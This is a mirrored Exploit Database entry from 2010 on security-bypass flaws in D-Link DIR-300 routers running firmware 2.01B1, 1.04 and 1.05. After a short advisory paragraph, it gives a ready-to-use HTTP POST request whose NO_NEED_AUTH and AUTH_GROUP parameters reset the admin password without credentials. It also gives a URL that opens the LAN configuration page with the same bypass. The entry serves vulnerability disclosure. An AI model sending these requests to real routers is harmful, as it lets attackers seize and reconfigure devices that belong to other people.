D-Link DIR-300 – Multiple Security Bypass Vulnerabilities

• Exploit Database
• 108 阅读

• 作者： Karol Celia
  日期： 2010-11-09
• 类别：

  • remote
  平台：

  • hardware
• 来源：https://www.exploit-db.com/exploits/34986/
• 1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19

  source: https://www.securityfocus.com/bid/44743/info   The D-Link DIR-300 wireless router is prone to multiple security-bypass vulnerabilities.   Remote attackers can exploit these issues to bypass security restrictions, access certain administrative functions, alter configuration, and compromise the affected device.   D-Link DIR-300 running firmware 2.01B1, 1.04, 1.05 are vulnerable. Additional models and firmware versions may also be affected.   POST http://www.example.com:80/tools_admin.php HTTP/1.1 Host: www.example.com Keep-Alive: 115 Content-Type: application/x-www-form-urlencoded Content-length: 0   ACTION_POST=LOGIN&LOGIN_USER=a&LOGIN_PASSWD=b&login=+Log+In+&NO_NEED_AUTH=1&AUTH_GROUP=0&admin_name=admin&admin_password1=uhOHahEh     http://www.example.com/bsc_lan.php?NO_NEED_AUTH=1&AUTH_GROUP=0